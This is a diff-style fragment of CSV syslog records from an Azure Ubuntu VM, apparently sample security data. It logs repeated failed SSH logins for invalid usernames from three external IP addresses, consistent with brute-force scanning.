+11706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:46,UbuntuDevEnv,2019-06-26 00:44:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,76692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:48,UbuntuDevEnv,2019-06-26 00:44:47,auth,UbuntuDevEnv,info,Failed password for invalid user ofbiz from 104.248.121.67 port 34980 ssh2,76692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ofbiz,104.248.121.6,34980,,
+11708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:48,UbuntuDevEnv,2019-06-26 00:44:47,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 34980:11: Bye Bye [preauth],76692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,34980,,
+11709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:48,UbuntuDevEnv,2019-06-26 00:44:47,auth,UbuntuDevEnv,info,Disconnected from invalid user ofbiz 104.248.121.67 port 34980 [preauth],76692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ofbiz,104.248.121.6,34980,,
+11710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:48,UbuntuDevEnv,2019-06-26 00:44:47,auth,UbuntuDevEnv,info,Invalid user chloe from 131.100.219.3 port 55982,76694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chloe,131.100.219.3,55982,,
+11711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:48,UbuntuDevEnv,2019-06-26 00:44:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:48,UbuntuDevEnv,2019-06-26 00:44:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,76694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:50,UbuntuDevEnv,2019-06-26 00:44:50,auth,UbuntuDevEnv,info,Failed password for invalid user chloe from 131.100.219.3 port 55982 ssh2,76694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chloe,131.100.219.3,55982,,
+11714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:50,UbuntuDevEnv,2019-06-26 00:44:50,auth,UbuntuDevEnv,info,Disconnected from invalid user chloe 131.100.219.3 port 55982 [preauth],76694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chloe,131.100.219.3,55982,,
+11715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:44:50,UbuntuDevEnv,2019-06-26 00:44:50,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 55982:11: Bye Bye [preauth],76694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,55982,,
+11716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:45:47,UbuntuDevEnv,2019-06-26 00:45:46,auth,UbuntuDevEnv,info,Invalid user sistemas from 186.31.116.78 port 48982,76994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistemas,186.31.116.7,48982,,
+11717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:45:47,UbuntuDevEnv,2019-06-26 00:45:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:45:47,UbuntuDevEnv,2019-06-26 00:45:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,76994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:45:49,UbuntuDevEnv,2019-06-26 00:45:48,auth,UbuntuDevEnv,info,Failed password for invalid user sistemas from 186.31.116.78 port 48982 ssh2,76994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistemas,186.31.116.7,48982,,
+11720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:45:49,UbuntuDevEnv,2019-06-26 00:45:48,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 48982:11: Bye Bye [preauth],76994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,48982,,
+11721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:45:49,UbuntuDevEnv,2019-06-26 00:45:48,auth,UbuntuDevEnv,info,Disconnected from invalid user sistemas 186.31.116.78 port 48982 [preauth],76994,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistemas,186.31.116.7,48982,,
+11722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:46:17,UbuntuDevEnv,2019-06-26 00:46:16,auth,UbuntuDevEnv,info,Invalid user guest from 104.248.121.67 port 43418,77101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,104.248.121.6,43418,,
+11723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:46:17,UbuntuDevEnv,2019-06-26 00:46:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,77101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:46:17,UbuntuDevEnv,2019-06-26 00:46:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:46:19,UbuntuDevEnv,2019-06-26 00:46:19,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 104.248.121.67 port 43418 ssh2,77101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,104.248.121.6,43418,,
+11726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:46:19,UbuntuDevEnv,2019-06-26 00:46:19,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 43418:11: Bye Bye [preauth],77101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,43418,,
+11727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:46:19,UbuntuDevEnv,2019-06-26 00:46:19,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 104.248.121.67 port 43418 [preauth],77101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,104.248.121.6,43418,,
+11728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:07,UbuntuDevEnv,2019-06-26 00:47:07,auth,UbuntuDevEnv,info,Invalid user cloudera from 131.100.219.3 port 44150,77274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloudera,131.100.219.3,44150,,
+11729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:07,UbuntuDevEnv,2019-06-26 00:47:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,77274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:07,UbuntuDevEnv,2019-06-26 00:47:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:09,UbuntuDevEnv,2019-06-26 00:47:09,auth,UbuntuDevEnv,info,Failed password for invalid user cloudera from 131.100.219.3 port 44150 ssh2,77274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloudera,131.100.219.3,44150,,
+11732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:10,UbuntuDevEnv,2019-06-26 00:47:09,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 44150:11: Bye Bye [preauth],77274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,44150,,
+11733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:10,UbuntuDevEnv,2019-06-26 00:47:09,auth,UbuntuDevEnv,info,Disconnected from invalid user cloudera 131.100.219.3 port 44150 [preauth],77274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloudera,131.100.219.3,44150,,
+11734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:50,UbuntuDevEnv,2019-06-26 00:47:49,auth,UbuntuDevEnv,info,Invalid user silverline from 104.248.121.67 port 51856,77510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silverline,104.248.121.6,51856,,
+11735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:50,UbuntuDevEnv,2019-06-26 00:47:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:50,UbuntuDevEnv,2019-06-26 00:47:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,77510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:52,UbuntuDevEnv,2019-06-26 00:47:52,auth,UbuntuDevEnv,info,Failed password for invalid user silverline from 104.248.121.67 port 51856 ssh2,77510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silverline,104.248.121.6,51856,,
+11738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:52,UbuntuDevEnv,2019-06-26 00:47:52,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 51856:11: Bye Bye [preauth],77510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,51856,,
+11739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:52,UbuntuDevEnv,2019-06-26 00:47:52,auth,UbuntuDevEnv,info,Disconnected from invalid user silverline 104.248.121.67 port 51856 [preauth],77510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silverline,104.248.121.6,51856,,
+11740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:53,UbuntuDevEnv,2019-06-26 00:47:52,auth,UbuntuDevEnv,info,Invalid user analytics from 186.31.116.78 port 57784,77517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,186.31.116.7,57784,,
+11741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:53,UbuntuDevEnv,2019-06-26 00:47:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:53,UbuntuDevEnv,2019-06-26 00:47:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,77517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:54,UbuntuDevEnv,2019-06-26 00:47:54,auth,UbuntuDevEnv,info,Failed password for invalid user analytics from 186.31.116.78 port 57784 ssh2,77517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,186.31.116.7,57784,,
+11744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:55,UbuntuDevEnv,2019-06-26 00:47:54,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 57784:11: Bye Bye [preauth],77517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,57784,,
+11745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:47:55,UbuntuDevEnv,2019-06-26 00:47:54,auth,UbuntuDevEnv,info,Disconnected from invalid user analytics 186.31.116.78 port 57784 [preauth],77517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,186.31.116.7,57784,,
+11746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:18,UbuntuDevEnv,2019-06-26 00:49:17,auth,UbuntuDevEnv,info,Invalid user sistemas from 104.248.121.67 port 60294,77813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistemas,104.248.121.6,60294,,
+11747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:18,UbuntuDevEnv,2019-06-26 00:49:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,77813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:18,UbuntuDevEnv,2019-06-26 00:49:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:20,UbuntuDevEnv,2019-06-26 00:49:19,auth,UbuntuDevEnv,info,Failed password for invalid user sistemas from 104.248.121.67 port 60294 ssh2,77813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistemas,104.248.121.6,60294,,
+11750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:20,UbuntuDevEnv,2019-06-26 00:49:19,auth,UbuntuDevEnv,info,Disconnected from invalid user sistemas 104.248.121.67 port 60294 [preauth],77813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistemas,104.248.121.6,60294,,
+11751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:20,UbuntuDevEnv,2019-06-26 00:49:19,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 60294:11: Bye Bye [preauth],77813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,60294,,
+11752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:22,UbuntuDevEnv,2019-06-26 00:49:21,auth,UbuntuDevEnv,info,Invalid user temp from 131.100.219.3 port 60558,77827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,131.100.219.3,60558,,
+11753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:22,UbuntuDevEnv,2019-06-26 00:49:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,77827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:22,UbuntuDevEnv,2019-06-26 00:49:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:23,UbuntuDevEnv,2019-06-26 00:49:23,auth,UbuntuDevEnv,info,Failed password for invalid user temp from 131.100.219.3 port 60558 ssh2,77827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,131.100.219.3,60558,,
+11756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:24,UbuntuDevEnv,2019-06-26 00:49:24,auth,UbuntuDevEnv,info,Disconnected from invalid user temp 131.100.219.3 port 60558 [preauth],77827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,131.100.219.3,60558,,
+11757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:24,UbuntuDevEnv,2019-06-26 00:49:24,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 60558:11: Bye Bye [preauth],77827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,60558,,
+11758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:51,UbuntuDevEnv,2019-06-26 00:49:51,auth,UbuntuDevEnv,info,Invalid user centos from 186.31.116.78 port 38348,77940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,186.31.116.7,38348,,
+11759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:51,UbuntuDevEnv,2019-06-26 00:49:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,77940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:51,UbuntuDevEnv,2019-06-26 00:49:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:53,UbuntuDevEnv,2019-06-26 00:49:52,auth,UbuntuDevEnv,info,Failed password for invalid user centos from 186.31.116.78 port 38348 ssh2,77940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,186.31.116.7,38348,,
+11762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:53,UbuntuDevEnv,2019-06-26 00:49:52,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 38348:11: Bye Bye [preauth],77940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,38348,,
+11763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:49:53,UbuntuDevEnv,2019-06-26 00:49:52,auth,UbuntuDevEnv,info,Disconnected from invalid user centos 186.31.116.78 port 38348 [preauth],77940,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,centos,186.31.116.7,38348,,
+11764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:39,UbuntuDevEnv,2019-06-26 00:51:39,auth,UbuntuDevEnv,info,Invalid user proxyuser from 131.100.219.3 port 48726,78308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxyuser,131.100.219.3,48726,,
+11765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:39,UbuntuDevEnv,2019-06-26 00:51:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,78308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
